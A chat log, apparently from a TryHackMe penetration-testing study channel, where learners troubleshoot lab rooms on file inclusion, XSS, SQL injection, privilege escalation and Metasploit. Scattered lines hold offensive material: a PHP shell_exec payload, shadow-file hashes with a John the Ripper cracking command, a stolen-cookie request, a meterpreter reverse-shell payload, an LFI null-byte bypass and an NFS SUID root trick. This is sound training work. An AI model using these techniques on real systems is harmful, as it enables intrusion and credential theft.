It's just text
If you want your code to be ran, you'll need to actually supply code
Most webservers can interpret php. So you'll probably wanna use that
Yea,but you called it .txt
Which means it's interpreted as text
Really? I thought it doesn't
Good point
@steel nymph || <?php echo shell_exec("hostname");?> ||
I'd have to look
the server || python command isnt running in the command line so id have to fix that as well||
well
I cant get that command to work on the attack box or the kali vm
Hello everyone, I'm having an issue with john the ripper and section 7 of the Linux PrivEsc chapter. I collected the passwd and shadow files and fed them john and retrieved the gerry user accounts password but not user2's, I do however know the password to user2 is in the wordlist. I'm also fairly confident I set the type correctly as sha512crypt... any ideas as to why john is not working for me?
indeed
I was able to get 1 out of 3 user accounts, alas not the one I needed
I tried, only shows 1 cracked hash and 2 uncracked
|| test ||
ok
@steel nymph i tried the simplehttpserver and it returned: no module named simplehttpserver
|| gerryconway:$6$vgzgxM3ybTlB.wkV$48YDY7qQnp4purOJ19mxfMOwKt.H2LaWKPu0zKlWKaUMG1N7weVzqobp65RxlMIZ/NirxeZdOJMEOp3ofE.RT/:1001:1001::/home/gerryconway:/bin/sh
user2:$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:1002:1002::/home/user2:/bin/sh
karen:$6$VjcrKz/6S8rhV4I7$yboTb0MExqpMXW0hjEJgqLWs/jGPJA7N/fEoPMuYLY1w16FwL7ECCbQWJqYLGpy.Zscna9GILCSaNLJdBP1p8/:1003:1003::/home/karen:/bin/sh ||
|| john -w /usr/share/wordlists/rockyou.txt --format=Sha512crypt unshadow.txt ||
tried that too, it runs as tricode
its so weird
i even know the passwords and know they are in the wordlist
I wish I knew what it was
I tried on both the attack boxes
about to spin up my own vm
i think I did last night but I'll try again
@steel nymph i got the server to work on 1337 and im guessing i need to use the same port on the address to
Giving up on SSRF Room 😑
Making some silly mistake @steel nymph 😑
@drifting drum .... thanks anyway... i went back through the other challenges and figured it out. /facepalm
Gave +1 Rep to @drifting drum
Yes I Can see the changes but no idea what to change 😑
Hey, i'm doing the Junior Penetration Tester path, and i'm in the xss module task 8, i have the problem that there are no "staff" actions happening here like expected. I dont get the http request from the server only the dns, the xss code is right, because i can see the request when i open the tickets self instead the "staff"
restarted 4 times...
waited different times, tested on nc and 10.10.10.100
yea, but we need the flag to complete the room
really... after restarting 5 times and frustrating over an hour now...
GET /?cookie=YWRtaW49ZmFsc2U7IHNlc3Npb249YmUzZDE1OGUzY2RlODIxOGNmNGNjMTExNTcyYzY0YjU= HTTP/1.1
its only my own, does someone can pm me the flag? thanks
So, for the 4th challenge on task 8 of file inclusion, am I supposed to establish a reverse shell to gather the hostname flag? or, am I supposed to just supply code for it to display in a curl response / on the web page?
@steel nymph I was trying to use the php reverse shell from the reverse shell cheatsheet and can't seem to get it to phone home, and I'm not quite sure where I'm going wrong. I've set up a couple other reverse shells, and I have the http server up and running so the file should be reachable, but I'm not getting any response on my nc listener.
Yeah... I think there's an error with the shell code.
last question of the metasploit module.... i have a meterpreter session, but how do i get hashdump to work here? It asks for a session...
Background your meterpreter session, enter sessions while in the msfconsole and set the session option for the hashdump to the number of the session.
Hi! Any idea of why the crontab PrivEsc in linux may not be working?
I just changed any of the root files for a reverse shell and started the nc listener in the attacking machine but is not working
ok im going to try this....
thanks
it seems stuck here
am i doing something wrong
yeah def that was it, working now, thx for helping always dude
Gave +1 Rep to @tulip elm
you can do it two different ways, if its a windows, you gotta make sure you're running on an NT AUTHORITY SYSTEM process if im not wrong and also you can use just hashdump in the meterpreter or using a post/windows/gather/hashdump and link it to the meterpreter session, if its a linux you gotta use the post/linux/gather/hashdump module and link it to the meterpreter session
Ah yeah this one was tricky
you can also try to load kiwi and use mimikatz but i didnt need to
yup yup i get the module i need to use, i just cant get to it from here
maybe you're having the same issue as i had, you're in the msfvenom module?
yes
yup
my issue was i wasnt using the same payload in the meterpreter as in the msfvenom payload
check it out
yeah i set that
that was making the session unstable and not able to work with the post module
||set payload linux/x86/meterpreter/reverse_tcp
||
are you getting any error?
do you get a reverse shell at all?
Uhm, well you could try to run the initial exploit where you get the meterpreter session with run -j (I believe it was to run it as a background job) so that it will be in the background already.
if that doesn't work either restart the machines and hit me up in dm so i can try to help you if u want to
ooooo
hang on hang on lads, i think we are getting somewhere
omg, thanks everyone, it worked
Nice! What was it?
just the session wasn't backgrounding properly. -j helped
Nite P:
@steel nymph i figured it out. was an error in the php shell code, i think i accidentally deleted a semicolon.
I am in the Attacktive Directory room and when I try to run GetNPUsers.py I am getting this error:
python3 GetNPUsers.py spookysec.local/svc-admin -no-pass 1 ⚙
Impacket v0.9.24.dev1+20211026.122819.ea023b28 - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for svc-admin
[-] [Errno Connection error (SPOOKYSEC.LOCAL:88)] [Errno -2] Name or service not known
This has happened on my VM as well as my kali desktop and the THM browser. Has anyone else ran into this problem?
did you get this resolved?
You would get your answer faster if you ask it right away 🙂
@urban snow yes I did thank you for reaching out
Gave +1 Rep to @urban snow
Not sure this belong to this room, but have you set your hosts file?
Using burpsuite to change the method from get to post and putting file in but not getting a file output
file inclusion task 8 flag 1
if you change get to post you also need to modify where you put the file name
also in the request?
yes and you need to add a content type
so is this something that is needed everytime i try and use this type of attack
also im not getting the flag i just get a warning
Yes and if you are not getting the flag there is something wrong with your request
you can also look at this link https://stackoverflow.com/questions/14551194/how-are-parameters-sent-in-an-http-post-request
what warning do you get?
I have to start a new machine it may have been that i will let you know in a second
ok
im just getting that there is no file in the directory
so im thinking that im putting it in the wrong spot or just doing something completely wrong
Hi,
Regarding the XSS room (Jr Pen. Tester path):
The last task seems broken. Is it just for me?
The request catcher doesn't get any HTML requests (only DNS) and a netcat listener on my local machine only gets my own cookie instead of the staff-cookie.
Can anyone please help?
Thx!
used %00 and it worked
👍
I think you need to wait a bit
Waited for more than 15 minutes.
I also tried to create another account / another request catcher instances.
This seems really buggy :(
I have just checked, it works fine
took a few tries but I got it to work as well
Hi guys, did anyone ran into a ffuf not giving results in "Authentication Bypass" room? (task 3)
Hi everyone, so I am trying to complete the "Walking Application Room" but I keep running into an issue. When I run on my Kali, it says packet filtered even though I have connected using openvpn
but tryhackme attackbox, it pings correctly. What do you recommend i do to fix the issue on my Kali?
Make sure your valid_usernames.txt doesn’t have any spaces after the names
Task 4 curl 2 requests, the curl command is properly typed in, I can’t get the green popup to say that the password reset email sent to attacker@hacker.com
I fixed it nvm
Hi everyone , I need your help. After starting the machine on "Content Discovery". When I try to open the link I get 'ERR_CONNECTION_TIMED_OUT' or browser cannot connect to server . How do I resolve this ? @primal whale , @heavy night
ssrf task 2 is somewhat difficult for me
nvm, solved
Restart the machine, and use the attack box provided and the link provided in the exercise by tryhackme, worked immediately
Wow that blind time based SQL injection took me so long to realize the issue, but if anyone gets stuck on that last task, remember to remove the table/column enumeration code and just do the account code standalone, not sure if it's just my brain that struggled with that or what
is anyone having problem with the server? i am doing Linux PrivEsc Cron. Tried using attackbox but getting connection error. Tried using my kali machine and can't get a reverse shell
Same
Trying to finish this tonight
I am using the attackbox. Still getting connection error
The one in the web browser? I know sometimes when I try to use my VM on some rooms it bugs out and I have to use the THM provided box.
I've been going for the past 2 hours without issues on a Kali box, but I've been working slowly
Did you use netcat or the link of tryhackme? On the attack box
i use nc on my kali vm. still can't connect to attackbox
Eyyy just reached top 1% rank
@noble rose @zealous marsh . It’s now working okay !!
Maybe it was my home wifi, currently using the office wifi .
Thank you for posting this... I'm not sure why but ||table_name like 'a_a_y_i_s%';--|| was working for me and I was like "wow this can't be right" 😂
Gave +1 Rep to @small scroll
https://tryhackme.com/room/winprivesc task6 how to transfer the executable file to windows ? as wget is not working
Anyone has done the Linux Privesc room?
yes, can I DM you?
use powershell Invokewebreq
What would be the name of the executable you would place in that folder?
i have given name as executable.exe
but it's expecting something else
yeah sure
Hi, for the meterpreter room, i run the exploit but it show this, can i have any idea why is this happened? Thank you in advanced.
meterpreter > sysinfo
[-] Unknown command: sysinfo.
meterpreter > [-] Failed to load extension: No response was received to the core_loadlib request.
[-] Failed to load extension: No response was received to the core_enumextcmd request.
did i missed something?
I'm stuck at nfs
which part?
nfs may be a bit tricky..i spent 4hours doin that! just because i have a shit PC and a shit network that freezes the whole PC everytime i did nfs
the nfs binary is in the ownership of ubuntu so how to run it from karen to get root shell?
mount
give suid perms
and run it from the shared dir of karen
are you Indian?
Kind of
cool
RIP lol
I got the same 3 things and two tickets each of the remaining ones
but I do have two rooms remaining
Good luck! It was fun anyway
didn't work from kali but worked from ubuntu lol
thanks btw
wht PC do u use?
a gaming laptop from asus
feeling it
Couldnt get this one can you please explain it again 😅
How does your request look like and where are you doing it? In burp, dev tools or where?
thank you @deep scaffold
Gave +1 Rep to @deep scaffold
Ok, let me break it down.
thanks)
Gave +1 Rep to @wraith ice
This is spoiler for LFI challenge 3. Inform me if this cant be posted here and correct me if i got anything wrong.
|| Run your burp. Next, in inspector or F12 in Mozilla, expand the lines of code. Go to the method, change GET to POST. Press include button to let burp catch it. Then in burp, go decoder and encode your path in URL. After encode, copy the encoded URL and paste it on the "file" parameter in the captured request. Then add "%00" behind the string. Then its done. ||
and anyone have idea on this?
What's the payload you used for the exploit to get the meterpreter session?
exploit/windows/smb/psexec right?
as in the question provided
Ye, mh.
Have you tried to restart the target machine, also are you starting msfconsole with sudo or as root (Not sure if it would make a difference, but worth to try)?
i tried all u mentioned. I restarted four times and use metasploit as root. And im not sure what did i missed.
Mh, are you on a VM, an installed OS or the attackbox ?
i use vm, should i use attack box?
Hmm
i should get a try
And openvpn is running directly inside your VM and not your host machine?
inside vm
I mean I will try it with my own VM again, as I can't remember if there was anything else to do in order to get it to work, but trying it with the attackbox meanwhile might be worth a try
yea, ill try it soon. was working on other thing rn.
Q on Authentication Bypass Task 5:
Why is the output of echo '{"id":1,"admin":true}' | base64 not the same as the accepted answer from base64encode.org ?
echo adds a newline
- How can I suppress this?
- I used the same method for the previous task
echo VEhNe0JBU0U2NF9FTkNPRElOR30= | base64 -d and it got me the right answer. Why is that?
Because \n is a character that would be encoded into base64
But it doesn't matter for decoding because it's not a part of base64?
Read the manual for echo.
Did. Succeeded with echo -n '{"id":1,"admin":true}' | base64 The -n flag was missing
Q on File Inclusion task 8
Can anyone in the Burp Intruder room help?
Task 10 the example does not work for me:
have you tried -v and or lowering the number of threads? answer should come in less than a min normally
Lol.
Gave +1 Rep to @deep scaffold
By default, hydra will print the credentials it found after it finishes running through the entire wordlist. With -v it will print them out as soon as it finds them. With -V it will print every login attempt
Np
Was wondering if someone could explain a concept to me. In the burp suite repeater room, in the extra mile task, there's a bit where it tells you to enter four nulls to keep the query from erroring out. Why does it error out without the nulls? Where does the number 4 come from?
for task 8 in LFI i guess using curl is easier
it is a union sql query, so you need to have the same numbers of columns in the request
yes, you don't have to worry about content type as curl take care of it for you
Oh I see now. Thank you!
Gave +1 Rep to @deep scaffold
it took me a while to figure that out, but hey worth it
Somehow I have a logic issue with SQL. Lets say I have access to 2 databases, shop and staff. Both of these databases have a table called user. If I query Select * from user; Would that give me back both tables or only from one of the databases? In case it gives me back only the table of a single database and I want to get the user table of the other database, would I have to specify Select * from staff.user; ? Any help would be much appreciated.
i think this question u can address to google and sql, not jr pentester path discord ch
Well I tried to search it on google but couldn't find an answer that explains it to me in order for me to understand. Also the sqli room (which I'm at right now) is in the jr pentester path, so I don't know why that question wouldn't fit in here :/
depending on how it is set and what database is behind, but will probably throw an error at you. Again depending of the configuration but you will probably have to specify database and table
What I figured out so far, can I make queries while being on the database server but not connected to a specific database, or do I always have to be on a database, like with use shop; first?
depends of the engine but you'll have to "use" a database or specify it in your request
Okay, thx tho 🙂


